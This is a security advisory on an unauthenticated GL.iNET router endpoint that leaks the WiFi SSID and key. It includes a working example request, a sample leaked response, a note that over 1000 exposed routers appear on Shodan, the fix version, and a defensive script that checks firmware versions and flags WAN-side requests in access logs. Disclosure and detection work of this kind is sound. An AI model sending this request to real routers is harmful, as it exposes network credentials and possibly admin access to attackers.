Overview - An API endpoint for all GL.iNET devices reveals information about the WiFi configuration, including SSID and key. This endpoint can be accessed without any sort of authentication (although the 4.x firmware documentation claims authentication is required). Affects versions <= 3.215. Example request and response below:
```http
POST /api/router/mesh/status HTTP/1.1
Host: 192.168.8.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 4

mac=

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 143
Connection: close
Date: Thu, 29 Dec 2022 21:51:13 GMT
Server: lighttpd/1.4.48
```
Description - The endpoint /api/router/mesh/status is not listed in the front-end of the web GUI on any GL.iNET device.
Steps to reproduce - run the Proof of Concept in the PoC section below using python3 exploit.py <domain/IP>, for example python3 exploit.py 192.168.8.1. Information such as the following will be returned: {'del': '0', 'led': '1', 'led_sync': '0', 'disabled': '2G', 'wifi_sync': '0', 'ssid': 'GL-XE300-343', 'key': 'goodlife', 'encryption': 'psk2', 'version': '3.215', 'code': 0}
Impact
Since this exploit isn’t very useful in default configurations for GL.iNET devices, a section on impact is needed. By default (on the device I’ve looked at), firewall rules block anything coming from the WAN side, meaning the only way to access the Web GUI is to already be on the LAN, which means the SSID key is already known.
However, this exploit is still relevant in non-standard configurations, such as ones where access to the Web GUI is enabled without having to be on the LAN (such as opening up the WAN firewall). This may allow an attacker to connect to the internal LAN.
In addition, the SSID key may be related to (or the same as) the admin password for the Web GUI. In this case, sending a simple request would give you admin access to the router.
Note that a search on Shodan gives over 1000 results, which means that (as of January 2023) there are at least 1000 vulnerable GL.iNET routers reachable by anyone around the world, with many more exposed in other scenarios.
Fix
This was fixed in version 3.216 by removing the /api/router/mesh/status endpoint from the list of unauthenticated endpoints.
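As an added defensive example (not part of the original advisory or GL.iNET's code), the script below does two things a defender would want: it decides from the 'version' field whether a firmware build falls in the affected range (<= 3.215), and it scans access-log lines for requests to /api/router/mesh/status coming from outside the LAN, which is the non-standard WAN-exposed case discussed under Impact. It assumes lighttpd writes a common-log-format access log and that the LAN is 192.168.8.0/24 (the default subnet shown in the request's Host header); the log lines are constructed for the example.

```python
import ipaddress
import re

# Endpoint named in the advisory; removed from the unauthenticated list in 3.216.
MESH_STATUS_PATH = "/api/router/mesh/status"
FIXED_VERSION = (3, 216)

# Assumption: the router's LAN is the default 192.168.8.0/24.
LAN = ipaddress.ip_network("192.168.8.0/24")

# Assumption: lighttpd access log in common log format
# ("src - - [timestamp] \"METHOD path HTTP/x\" status size").
_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: two LAN requests, then two hits from public addresses.
SAMPLE_LOG = """\
192.168.8.100 - - [29/Dec/2022:21:50:02 +0000] "GET /index.html HTTP/1.1" 200 1024
192.168.8.100 - - [29/Dec/2022:21:51:13 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143
203.0.113.7 - - [29/Dec/2022:21:52:40 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143
198.51.100.9 - - [29/Dec/2022:21:53:01 +0000] "GET /api/router/mesh/status HTTP/1.1" 200 143
""".splitlines()


def parse_version(version: str) -> tuple[int, int]:
    """Turn a '3.215'-style firmware string into a comparable (major, minor) pair."""
    major, minor = version.split(".", 1)
    return int(major), int(minor)


def is_affected(version: str) -> bool:
    """True when the firmware is in the advisory's affected range (<= 3.215)."""
    return parse_version(version) < FIXED_VERSION


def flag_wan_mesh_status_hits(log_lines):
    """Return (source_ip, http_status) for every mesh/status request not from the LAN."""
    hits = []
    for line in log_lines:
        match = _LOG_RE.match(line)
        if not match or match["path"] != MESH_STATUS_PATH:
            continue
        if ipaddress.ip_address(match["src"]) not in LAN:
            hits.append((match["src"], int(match["status"])))
    return hits


if __name__ == "__main__":
    print("3.215 affected:", is_affected("3.215"))
    print("WAN-side hits:", flag_wan_mesh_status_hits(SAMPLE_LOG))
```

A 200 response to one of the flagged requests on an affected build means the SSID key was handed out without authentication; on 3.216 or later the endpoint should no longer answer unauthenticated callers.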